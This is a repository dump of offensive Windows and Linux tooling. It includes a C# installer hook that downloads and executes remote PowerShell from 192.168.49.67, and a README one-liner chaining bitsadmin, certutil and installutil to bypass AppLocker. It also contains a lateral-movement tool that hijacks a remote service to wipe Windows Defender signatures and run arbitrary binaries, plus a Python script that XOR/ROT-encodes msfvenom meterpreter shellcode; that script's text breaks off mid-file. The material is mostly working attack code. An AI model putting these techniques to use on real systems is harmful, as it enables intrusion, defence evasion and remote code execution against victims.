├── .gitignore ├── AppLocker Bypass PowerShell Runspace ├── App.config ├── AppLocker Bypass PowerShell Runspace.csproj ├── AppLocker Bypass PowerShell Runspace.sln ├── Program.cs ├── Properties │ └── AssemblyInfo.cs └── README.md ├── Fileless Lateral Movement ├── App.config ├── Fileless Lateral Movement.csproj ├── Fileless Lateral Movement.sln ├── Program.cs └── Properties │ └── AssemblyInfo.cs ├── Linux Shellcode Encoder └── shellcodeCrypter.py ├── Linux Shellcode Loaders ├── sharedLibrary_LD_LIBRARY_PATH.c ├── sharedLibrary_LD_PRELOAD.c ├── simpleLoader.c └── simpleXORencoder.c ├── MSSQL ├── App.config ├── MSSQL.csproj ├── MSSQL.sln ├── Program.cs └── Properties │ └── AssemblyInfo.cs ├── MiniDump ├── App.config ├── MiniDump.csproj ├── MiniDump.ps1 ├── MiniDump.sln ├── Program.cs └── Properties │ └── AssemblyInfo.cs ├── PrintSpoofer.NET ├── App.config ├── PrintSpoofer.csproj ├── PrintSpoofer.sln ├── Program.cs └── Properties │ └── AssemblyInfo.cs ├── README.md ├── ROT Shellcode Encoder ├── App.config ├── Program.cs ├── Properties │ └── AssemblyInfo.cs ├── ROT Shellcode Encoder.csproj └── ROT Shellcode Encoder.sln ├── Sections Shellcode Process Injector ├── App.config ├── Program.cs ├── Properties │ └── AssemblyInfo.cs ├── Sections Shellcode Process Injector.csproj └── Sections Shellcode Process Injector.sln ├── Shellcode Process Hollowing ├── App.config ├── Program.cs ├── Properties │ └── AssemblyInfo.cs ├── Shellcode Process Hollowing.csproj └── Shellcode Process Hollowing.sln ├── Shellcode Process Injector ├── App.config ├── Program.cs ├── Properties │ └── AssemblyInfo.cs ├── Shellcode Process Injector.csproj ├── Shellcode Process Injector.ps1 └── Shellcode Process Injector.sln ├── Simple Shellcode Runner ├── App.config ├── Program.cs ├── Properties │ └── AssemblyInfo.cs ├── Simple Shellcode Runner.csproj ├── Simple Shellcode Runner.ps1 ├── Simple Shellcode Runner.sln └── Simple Shellcode Runner.vba └── XOR Shellcode Encoder ├── App.config ├── Program.cs ├── Properties └── AssemblyInfo.cs ├── XOR Shellcode Encoder.csproj └── XOR Shellcode Encoder.sln /.gitignore: -------------------------------------------------------------------------------- 1 | ## Ignore Visual Studio temporary files, build results, and 2 | ## files generated by popular Visual Studio add-ons. 3 | ## 4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore 5 | 6 | # User-specific files 7 | *.rsuser 8 | *.suo 9 | *.user 10 | *.userosscache 11 | *.sln.docstates 12 | 13 | # User-specific files (MonoDevelop/Xamarin Studio) 14 | *.userprefs 15 | 16 | # Mono auto generated files 17 | mono_crash.* 18 | 19 | # Build results 20 | [Dd]ebug/ 21 | [Dd]ebugPublic/ 22 | [Rr]elease/ 23 | [Rr]eleases/ 24 | x64/ 25 | x86/ 26 | [Ww][Ii][Nn]32/ 27 | [Aa][Rr][Mm]/ 28 | [Aa][Rr][Mm]64/ 29 | bld/ 30 | [Bb]in/ 31 | [Oo]bj/ 32 | [Ll]og/ 33 | [Ll]ogs/ 34 | 35 | # Visual Studio 2015/2017 cache/options directory 36 | .vs/ 37 | # Uncomment if you have tasks that create the project's static files in wwwroot 38 | #wwwroot/ 39 | 40 | # Visual Studio 2017 auto generated files 41 | Generated\ Files/ 42 | 43 | # MSTest test Results 44 | [Tt]est[Rr]esult*/ 45 | [Bb]uild[Ll]og.* 46 | 47 | # NUnit 48 | *.VisualState.xml 49 | TestResult.xml 50 | nunit-*.xml 51 | 52 | # Build Results of an ATL Project 53 | [Dd]ebugPS/ 54 | [Rr]eleasePS/ 55 | dlldata.c 56 | 57 | # Benchmark Results 58 | BenchmarkDotNet.Artifacts/ 59 | 60 | # .NET Core 61 | project.lock.json 62 | project.fragment.lock.json 63 | artifacts/ 64 | 65 | # ASP.NET Scaffolding 66 | ScaffoldingReadMe.txt 67 | 68 | # StyleCop 69 | StyleCopReport.xml 70 | 71 | # Files built by Visual Studio 72 | *_i.c 73 | *_p.c 74 | *_h.h 75 | *.ilk 76 | *.meta 77 | *.obj 78 | *.iobj 79 | *.pch 80 | *.pdb 81 | *.ipdb 82 | *.pgc 83 | *.pgd 84 | *.rsp 85 | *.sbr 86 | *.tlb 87 | *.tli 88 | *.tlh 89 | *.tmp 90 | *.tmp_proj 91 | *_wpftmp.csproj 92 | *.log 93 | *.vspscc 94 | *.vssscc 95 | .builds 96 | *.pidb 97 | *.svclog 98 | *.scc 99 | 100 | # Chutzpah Test files 101 | _Chutzpah* 102 | 103 | # Visual C++ cache files 104 | ipch/ 105 | *.aps 106 | *.ncb 107 | *.opendb 108 | *.opensdf 109 | *.sdf 110 | *.cachefile 111 | *.VC.db 112 | *.VC.VC.opendb 113 | 114 | # Visual Studio profiler 115 | *.psess 116 | *.vsp 117 | *.vspx 118 | *.sap 119 | 120 | # Visual Studio Trace Files 121 | *.e2e 122 | 123 | # TFS 2012 Local Workspace 124 | $tf/ 125 | 126 | # Guidance Automation Toolkit 127 | *.gpState 128 | 129 | # ReSharper is a .NET coding add-in 130 | _ReSharper*/ 131 | *.[Rr]e[Ss]harper 132 | *.DotSettings.user 133 | 134 | # TeamCity is a build add-in 135 | _TeamCity* 136 | 137 | # DotCover is a Code Coverage Tool 138 | *.dotCover 139 | 140 | # AxoCover is a Code Coverage Tool 141 | .axoCover/* 142 | !.axoCover/settings.json 143 | 144 | # Coverlet is a free, cross platform Code Coverage Tool 145 | coverage*.json 146 | coverage*.xml 147 | coverage*.info 148 | 149 | # Visual Studio code coverage results 150 | *.coverage 151 | *.coveragexml 152 | 153 | # NCrunch 154 | _NCrunch_* 155 | .*crunch*.local.xml 156 | nCrunchTemp_* 157 | 158 | # MightyMoose 159 | *.mm.* 160 | AutoTest.Net/ 161 | 162 | # Web workbench (sass) 163 | .sass-cache/ 164 | 165 | # Installshield output folder 166 | [Ee]xpress/ 167 | 168 | # DocProject is a documentation generator add-in 169 | DocProject/buildhelp/ 170 | DocProject/Help/*.HxT 171 | DocProject/Help/*.HxC 172 | DocProject/Help/*.hhc 173 | DocProject/Help/*.hhk 174 | DocProject/Help/*.hhp 175 | DocProject/Help/Html2 176 | DocProject/Help/html 177 | 178 | # Click-Once directory 179 | publish/ 180 | 181 | # Publish Web Output 182 | *.[Pp]ublish.xml 183 | *.azurePubxml 184 | # Note: Comment the next line if you want to checkin your web deploy settings, 185 | # but database connection strings (with potential passwords) will be unencrypted 186 | *.pubxml 187 | *.publishproj 188 | 189 | # Microsoft Azure Web App publish settings. Comment the next line if you want to 190 | # checkin your Azure Web App publish settings, but sensitive information contained 191 | # in these scripts will be unencrypted 192 | PublishScripts/ 193 | 194 | # NuGet Packages 195 | *.nupkg 196 | # NuGet Symbol Packages 197 | *.snupkg 198 | # The packages folder can be ignored because of Package Restore 199 | **/[Pp]ackages/* 200 | # except build/, which is used as an MSBuild target. 201 | !**/[Pp]ackages/build/ 202 | # Uncomment if necessary however generally it will be regenerated when needed 203 | #!**/[Pp]ackages/repositories.config 204 | # NuGet v3's project.json files produces more ignorable files 205 | *.nuget.props 206 | *.nuget.targets 207 | 208 | # Microsoft Azure Build Output 209 | csx/ 210 | *.build.csdef 211 | 212 | # Microsoft Azure Emulator 213 | ecf/ 214 | rcf/ 215 | 216 | # Windows Store app package directories and files 217 | AppPackages/ 218 | BundleArtifacts/ 219 | Package.StoreAssociation.xml 220 | _pkginfo.txt 221 | *.appx 222 | *.appxbundle 223 | *.appxupload 224 | 225 | # Visual Studio cache files 226 | # files ending in .cache can be ignored 227 | *.[Cc]ache 228 | # but keep track of directories ending in .cache 229 | !?*.[Cc]ache/ 230 | 231 | # Others 232 | ClientBin/ 233 | ~$* 234 | *~ 235 | *.dbmdl 236 | *.dbproj.schemaview 237 | *.jfm 238 | *.pfx 239 | *.publishsettings 240 | orleans.codegen.cs 241 | 242 | # Including strong name files can present a security risk 243 | # (https://github.com/github/gitignore/pull/2483#issue-259490424) 244 | #*.snk 245 | 246 | # Since there are multiple workflows, uncomment next line to ignore bower_components 247 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622) 248 | #bower_components/ 249 | 250 | # RIA/Silverlight projects 251 | Generated_Code/ 252 | 253 | # Backup & report files from converting an old project file 254 | # to a newer Visual Studio version. Backup files are not needed, 255 | # because we have git ;-) 256 | _UpgradeReport_Files/ 257 | Backup*/ 258 | UpgradeLog*.XML 259 | UpgradeLog*.htm 260 | ServiceFabricBackup/ 261 | *.rptproj.bak 262 | 263 | # SQL Server files 264 | *.mdf 265 | *.ldf 266 | *.ndf 267 | 268 | # Business Intelligence projects 269 | *.rdl.data 270 | *.bim.layout 271 | *.bim_*.settings 272 | *.rptproj.rsuser 273 | *- [Bb]ackup.rdl 274 | *- [Bb]ackup ([0-9]).rdl 275 | *- [Bb]ackup ([0-9][0-9]).rdl 276 | 277 | # Microsoft Fakes 278 | FakesAssemblies/ 279 | 280 | # GhostDoc plugin setting file 281 | *.GhostDoc.xml 282 | 283 | # Node.js Tools for Visual Studio 284 | .ntvs_analysis.dat 285 | node_modules/ 286 | 287 | # Visual Studio 6 build log 288 | *.plg 289 | 290 | # Visual Studio 6 workspace options file 291 | *.opt 292 | 293 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.) 294 | *.vbw 295 | 296 | # Visual Studio LightSwitch build output 297 | **/*.HTMLClient/GeneratedArtifacts 298 | **/*.DesktopClient/GeneratedArtifacts 299 | **/*.DesktopClient/ModelManifest.xml 300 | **/*.Server/GeneratedArtifacts 301 | **/*.Server/ModelManifest.xml 302 | _Pvt_Extensions 303 | 304 | # Paket dependency manager 305 | .paket/paket.exe 306 | paket-files/ 307 | 308 | # FAKE - F# Make 309 | .fake/ 310 | 311 | # CodeRush personal settings 312 | .cr/personal 313 | 314 | # Python Tools for Visual Studio (PTVS) 315 | __pycache__/ 316 | *.pyc 317 | 318 | # Cake - Uncomment if you are using it 319 | # tools/** 320 | # !tools/packages.config 321 | 322 | # Tabs Studio 323 | *.tss 324 | 325 | # Telerik's JustMock configuration file 326 | *.jmconfig 327 | 328 | # BizTalk build output 329 | *.btp.cs 330 | *.btm.cs 331 | *.odx.cs 332 | *.xsd.cs 333 | 334 | # OpenCover UI analysis results 335 | OpenCover/ 336 | 337 | # Azure Stream Analytics local run output 338 | ASALocalRun/ 339 | 340 | # MSBuild Binary and Structured Log 341 | *.binlog 342 | 343 | # NVidia Nsight GPU debugger configuration file 344 | *.nvuser 345 | 346 | # MFractors (Xamarin productivity tool) working folder 347 | .mfractor/ 348 | 349 | # Local History for Visual Studio 350 | .localhistory/ 351 | 352 | # BeatPulse healthcheck temp database 353 | healthchecksdb 354 | 355 | # Backup folder for Package Reference Convert tool in Visual Studio 2017 356 | MigrationBackup/ 357 | 358 | # Ionide (cross platform F# VS Code tools) working folder 359 | .ionide/ 360 | 361 | # Fody - auto-generated XML schema 362 | FodyWeavers.xsd 363 | -------------------------------------------------------------------------------- /AppLocker Bypass PowerShell Runspace/App.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /AppLocker Bypass PowerShell Runspace/AppLocker Bypass PowerShell Runspace.csproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {94AEDCE4-D4A2-45DB-B98E-860EE6BE8385} 8 | Exe 9 | AppLocker_Bypass_PowerShell_Runspace 10 | AppLocker Bypass PowerShell Runspace 11 | v4.7.2 12 | 512 13 | true 14 | true 15 | 16 | 17 | AnyCPU 18 | true 19 | full 20 | false 21 | bin\Debug\ 22 | DEBUG;TRACE 23 | prompt 24 | 4 25 | 26 | 27 | AnyCPU 28 | pdbonly 29 | true 30 | bin\Release\ 31 | TRACE 32 | prompt 33 | 4 34 | 35 | 36 | 37 | 38 | 39 | 40 | False 41 | ..\..\..\..\..\..\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | -------------------------------------------------------------------------------- /AppLocker Bypass PowerShell Runspace/AppLocker Bypass PowerShell Runspace.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.30804.86 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "AppLocker Bypass PowerShell Runspace", "AppLocker Bypass PowerShell Runspace.csproj", "{94AEDCE4-D4A2-45DB-B98E-860EE6BE8385}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Release|Any CPU = Release|Any CPU 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {94AEDCE4-D4A2-45DB-B98E-860EE6BE8385}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 15 | {94AEDCE4-D4A2-45DB-B98E-860EE6BE8385}.Debug|Any CPU.Build.0 = Debug|Any CPU 16 | {94AEDCE4-D4A2-45DB-B98E-860EE6BE8385}.Release|Any CPU.ActiveCfg = Release|Any CPU 17 | {94AEDCE4-D4A2-45DB-B98E-860EE6BE8385}.Release|Any CPU.Build.0 = Release|Any CPU 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | GlobalSection(ExtensibilityGlobals) = postSolution 23 | SolutionGuid = {2EC8A5D7-7AA0-43D5-A631-D9AEC215E93F} 24 | EndGlobalSection 25 | EndGlobal 26 | -------------------------------------------------------------------------------- /AppLocker Bypass PowerShell Runspace/Program.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Management.Automation; 3 | using System.Management.Automation.Runspaces; 4 | using System.Configuration.Install; 5 | 6 | namespace Bypass 7 | { 8 | class Program 9 | { 10 | static void Main(string[] args) 11 | { 12 | Console.WriteLine("Nothing going on in this binary."); 13 | } 14 | } 15 | [System.ComponentModel.RunInstaller(true)] 16 | public class Sample : Installer 17 | { 18 | public override void Uninstall(System.Collections.IDictionary savedState) 19 | { 20 | String cmd = "(New-Object Net.WebClient).DownloadString('http://192.168.49.67/run.txt') | iex"; 21 | Runspace rs = RunspaceFactory.CreateRunspace(); 22 | rs.Open(); 23 | PowerShell ps = PowerShell.Create(); 24 | ps.Runspace = rs; 25 | ps.AddScript(cmd); 26 | ps.Invoke(); 27 | rs.Close(); 28 | } 29 | } 30 | } -------------------------------------------------------------------------------- /AppLocker Bypass PowerShell Runspace/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("AppLocker Bypass PowerShell Runspace")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("AppLocker Bypass PowerShell Runspace")] 13 | [assembly: AssemblyCopyright("Copyright © 2021")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("94aedce4-d4a2-45db-b98e-860ee6be8385")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /AppLocker Bypass PowerShell Runspace/README.md: -------------------------------------------------------------------------------- 1 | # AppLocker Bypass PowerShell Runspace 2 | 3 | We can encode this into a text file with `CertUtil`. 4 | 5 | ```powershell 6 | certutil -encode C:\Path\To\Binary.exe binary-coded.txt 7 | ``` 8 | 9 | We then run the following oneliner on the target to use the combination of Microsoft-signed binaries to effectively bypass AppLocker. 10 | 11 | ```powershell 12 | cmd.exe /c del C:\Windows\Tasks\enc.txt && del c:\Windows\Tasks\a.exe && bitsadmin /Transfer theJob http://192.168.49.67/PSRunspace-InvokeRun-certutilCoded.txt C:\Windows\Tasks\enc.txt && certutil -decode C:\Windows\Tasks\enc.txt C:\Windows\Tasks\a.exe && C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil.exe /logfile= /LogToConsole=false /U C:\Windows\Tasks\a.exe 13 | ``` -------------------------------------------------------------------------------- /Fileless Lateral Movement/App.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Fileless Lateral Movement/Fileless Lateral Movement.csproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {77F955C3-4910-49EA-9CD4-CBF5AD9C071A} 8 | Exe 9 | Fileless_Lateral_Movement 10 | Fileless Lateral Movement 11 | v4.7.2 12 | 512 13 | true 14 | true 15 | 16 | 17 | AnyCPU 18 | true 19 | full 20 | false 21 | bin\Debug\ 22 | DEBUG;TRACE 23 | prompt 24 | 4 25 | 26 | 27 | AnyCPU 28 | pdbonly 29 | true 30 | bin\Release\ 31 | TRACE 32 | prompt 33 | 4 34 | 35 | 36 | true 37 | bin\x64\Debug\ 38 | DEBUG;TRACE 39 | full 40 | x64 41 | 7.3 42 | prompt 43 | true 44 | 45 | 46 | bin\x64\Release\ 47 | TRACE 48 | true 49 | pdbonly 50 | x64 51 | 7.3 52 | prompt 53 | true 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | -------------------------------------------------------------------------------- /Fileless Lateral Movement/Fileless Lateral Movement.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.30804.86 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Fileless Lateral Movement", "Fileless Lateral Movement.csproj", "{77F955C3-4910-49EA-9CD4-CBF5AD9C071A}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Release|Any CPU = Release|Any CPU 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {77F955C3-4910-49EA-9CD4-CBF5AD9C071A}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 15 | {77F955C3-4910-49EA-9CD4-CBF5AD9C071A}.Debug|Any CPU.Build.0 = Debug|Any CPU 16 | {77F955C3-4910-49EA-9CD4-CBF5AD9C071A}.Release|Any CPU.ActiveCfg = Release|Any CPU 17 | {77F955C3-4910-49EA-9CD4-CBF5AD9C071A}.Release|Any CPU.Build.0 = Release|Any CPU 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | GlobalSection(ExtensibilityGlobals) = postSolution 23 | SolutionGuid = {005359DF-09A1-4FE2-8F0F-8F91C2BDE1DC} 24 | EndGlobalSection 25 | EndGlobal 26 | -------------------------------------------------------------------------------- /Fileless Lateral Movement/Program.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Runtime.InteropServices; 3 | 4 | namespace PSLessExec 5 | { 6 | public class Program 7 | { 8 | public static uint SC_MANAGER_ALL_ACCESS = 0xF003F; 9 | public static uint SERVICE_ALL_ACCESS = 0xF01FF; 10 | public static uint SERVICE_DEMAND_START = 0x3; 11 | public static uint SERVICE_NO_CHANGE = 0xffffffff; 12 | 13 | [StructLayout(LayoutKind.Sequential)] 14 | public class QUERY_SERVICE_CONFIG 15 | { 16 | [MarshalAs(System.Runtime.InteropServices.UnmanagedType.U4)] 17 | public UInt32 dwServiceType; 18 | [MarshalAs(System.Runtime.InteropServices.UnmanagedType.U4)] 19 | public UInt32 dwStartType; 20 | [MarshalAs(System.Runtime.InteropServices.UnmanagedType.U4)] 21 | public UInt32 dwErrorControl; 22 | [MarshalAs(System.Runtime.InteropServices.UnmanagedType.LPWStr)] 23 | public String lpBinaryPathName; 24 | [MarshalAs(System.Runtime.InteropServices.UnmanagedType.LPWStr)] 25 | public String lpLoadOrderGroup; 26 | [MarshalAs(System.Runtime.InteropServices.UnmanagedType.U4)] 27 | public UInt32 dwTagID; 28 | [MarshalAs(System.Runtime.InteropServices.UnmanagedType.LPWStr)] 29 | public String lpDependencies; 30 | [MarshalAs(System.Runtime.InteropServices.UnmanagedType.LPWStr)] 31 | public String lpServiceStartName; 32 | [MarshalAs(System.Runtime.InteropServices.UnmanagedType.LPWStr)] 33 | public String lpDisplayName; 34 | }; 35 | 36 | [DllImport("advapi32.dll", EntryPoint = "OpenSCManagerW", ExactSpelling = true, CharSet = CharSet.Unicode, SetLastError = true)] 37 | public static extern IntPtr OpenSCManager(string machineName, string databaseName, uint dwAccess); 38 | 39 | [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Auto)] 40 | static extern IntPtr OpenService(IntPtr hSCManager, string lpServiceName, uint dwDesiredAccess); 41 | 42 | [DllImport("advapi32.dll", CharSet = CharSet.Unicode, SetLastError = true)] 43 | public static extern Boolean QueryServiceConfig(IntPtr hService, IntPtr intPtrQueryConfig, UInt32 cbBufSize, out UInt32 pcbBytesNeeded); 44 | 45 | [DllImport("advapi32.dll", EntryPoint = "ChangeServiceConfig")] 46 | [return: MarshalAs(UnmanagedType.Bool)] 47 | public static extern bool ChangeServiceConfigA(IntPtr hService, uint dwServiceType, uint dwStartType, int dwErrorControl, string lpBinaryPathName, string lpLoadOrderGroup, string lpdwTagId, string lpDependencies, string lpServiceStartName, string lpPassword, string lpDisplayName); 48 | 49 | [DllImport("advapi32", SetLastError = true)] 50 | [return: MarshalAs(UnmanagedType.Bool)] 51 | public static extern bool StartService(IntPtr hService, int dwNumServiceArgs, string[] lpServiceArgVectors); 52 | 53 | public static void Main(string[] args) 54 | { 55 | if (args.Length != 3) 56 | { 57 | Console.WriteLine("Usage: PSLessExec.exe [Target] [Service] [BinaryToRun]"); 58 | Console.WriteLine("Example: PSLessExec.exe appsrv01 SensorService notepad.exe"); 59 | return; 60 | } 61 | 62 | // Open remote SCManager 63 | IntPtr SCMHandle = OpenSCManager(args[0], null, SC_MANAGER_ALL_ACCESS); 64 | Console.WriteLine($"Got handle on SCManager on {args[0]}: {SCMHandle}."); 65 | 66 | // Access target service 67 | IntPtr schService = OpenService(SCMHandle, args[1], SERVICE_ALL_ACCESS); 68 | Console.WriteLine($"Got handle on target service {args[1]}: {schService}."); 69 | 70 | // Get current binPath (two passes, first is to determine the buffer size needed) 71 | UInt32 dwBytesNeeded; 72 | QUERY_SERVICE_CONFIG qsc = new QUERY_SERVICE_CONFIG(); 73 | bool bResult = QueryServiceConfig(schService, IntPtr.Zero, 0, out dwBytesNeeded); 74 | IntPtr ptr = Marshal.AllocHGlobal((int)dwBytesNeeded); 75 | bResult = QueryServiceConfig(schService, ptr, dwBytesNeeded, out dwBytesNeeded); 76 | Marshal.PtrToStructure(ptr, qsc); 77 | String binPathOrig = qsc.lpBinaryPathName; 78 | 79 | // Pass 1: Disable Defender signatures 80 | String defBypass = "\"C:\\Program Files\\Windows Defender\\MpCmdRun.exe\" -RemoveDefinitions -All"; 81 | bResult = ChangeServiceConfigA(schService, SERVICE_NO_CHANGE, SERVICE_DEMAND_START, 0, defBypass, null, null, null, null, null, null); 82 | Console.WriteLine($"Overwrote service executable to become '{defBypass}', result: {bResult}."); 83 | 84 | // Run the service for Pass 1 85 | bResult = StartService(schService, 0, null); 86 | Console.WriteLine("Launched service, defender signatures should be wiped."); 87 | 88 | // Pass 2: Run the chosen binary 89 | bResult = ChangeServiceConfigA(schService, SERVICE_NO_CHANGE, SERVICE_DEMAND_START, 0, args[2], null, null, null, null, null, null); 90 | Console.WriteLine($"Overwrote service executable to become '{args[2]}', result: {bResult}."); 91 | 92 | // Run the service for Pass 2 93 | bResult = StartService(schService, 0, null); 94 | Console.WriteLine("Launched service. Check for execution!"); 95 | 96 | // Pass 3: Restore original binPath 97 | bResult = ChangeServiceConfigA(schService, SERVICE_NO_CHANGE, SERVICE_DEMAND_START, 0, binPathOrig, null, null, null, null, null, null); 98 | Console.WriteLine($"Restored service binary to '{binPathOrig}', result: {bResult}."); 99 | } 100 | } 101 | } -------------------------------------------------------------------------------- /Fileless Lateral Movement/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("Fileless Lateral Movement")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("Fileless Lateral Movement")] 13 | [assembly: AssemblyCopyright("Copyright © 2021")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("77f955c3-4910-49ea-9cd4-cbf5ad9c071a")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /Linux Shellcode Encoder/shellcodeCrypter.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | 3 | # Basic shellcode crypter for C# payloads 4 | # By Cas van Cooten 5 | 6 | import re 7 | import platform 8 | import argparse 9 | import subprocess 10 | from random import randint 11 | 12 | if platform.system() != "Linux": 13 | exit("[x] ERROR: Only Linux is supported for this utility script.") 14 | 15 | class bcolors: 16 | OKBLUE = '\033[94m' 17 | OKGREEN = '\033[92m' 18 | FAIL = '\033[91m' 19 | ENDC = '\033[0m' 20 | BOLD = '\033[1m' 21 | 22 | # Parse input arguments 23 | parser = argparse.ArgumentParser() 24 | parser.add_argument("lhost", help="listener IP to use") 25 | parser.add_argument("lport", help="listener port to use") 26 | parser.add_argument("type", help="the encoding type to use ('xor' or 'rot')", nargs='?', default="xor") 27 | parser.add_argument("key", help="the key to encode the payload with (integer)", type=int, nargs='?', default=randint(1,255)) 28 | parser.add_argument("payload", help="the payload type from msfvenom to generate shellcode for (default: windows/x64/meterpreter/reverse_tcp)", nargs='?', default="windows/x64/meterpreter/reverse_tcp") 29 | args = parser.parse_args() 30 | 31 | # Generate the shellcode given the preferred payload 32 | print(f"{bcolors.BOLD}{bcolors.OKBLUE}[i] Generating payload {bcolors.OKGREEN}{args.payload}{bcolors.OKBLUE} for LHOST={bcolors.OKGREEN}{args.lhost}{bcolors.OKBLUE} and LPORT={bcolors.OKGREEN}{args.lport}{bcolors.ENDC}") 33 | result = subprocess.run(['msfvenom', '-p', args.payload, f"LHOST={args.lhost}", f"LPORT={args.lport}", 'exitfunc=thread', "-f", "csharp"], stdout=subprocess.PIPE) 34 | 35 | if result.returncode != 0: 36 | exit(f"{bcolors.BOLD}{bcolors.FAIL}[x] ERROR: Msfvenom generation unsuccessful. Are you sure msfvenom is installed?{bcolors.ENDC}") 37 | 38 | # Get the payload bytes and split them 39 | payload = re.search(r"{([^}]+)}", result.stdout.decode("utf-8")).group(1).replace('\n', '').split(",") 40 | 41 | # Encode the payload with the chosen type and key 42 | print(f"{bcolors.BOLD}{bcolors.OKBLUE}[i] Encoding payload with type {bcolors.OKGREEN}{args.type}{bcolors.OKBLUE} and key {bcolors.OKGREEN}{args.key}{bcolors.ENDC}") 43 | for i, byte in enumerate(payload): 44 | byteInt = int(byte, 16) 45 | 46 | if args.type == "xor": 47 | byteInt = byteInt ^ args.key 48 | elif args.type == "rot": 49 | byteInt = byteInt + args.key & 255 50 | else: 51 | exit(f"{bcolors.BOLD}{bcolors.FAIL}[x] ERROR: Invalid encoding type.{bcolors.ENDC}") 52 | 53 | payload[i] = "{0:#0{1}x}".format(byteInt,4) 54 | 55 | # Format the output payload 56 | payLen = len(payload) 57 | payload = re.sub("(.{65})", "\\1\n", ','.join(payload), 0, re.DOTALL) 58 | payloadFormatted = f"// msfvenom -p {args.payload} LHOST={args.lhost} LPORT={args.lport} EXITFUNC=thread -f csharp\n" 59 | payloadFormatted += f"// {args.type}-encoded with key {hex(args.key)}\n" 60 | payloadFormatted += f"byte[] buf = new byte[{str(payLen)}] {{\n{payload}\n}};" 61 | if payLen > 1000: 62 | f = open("/tmp/payload.txt", "w") 63 | f.write(payloadFormatted) 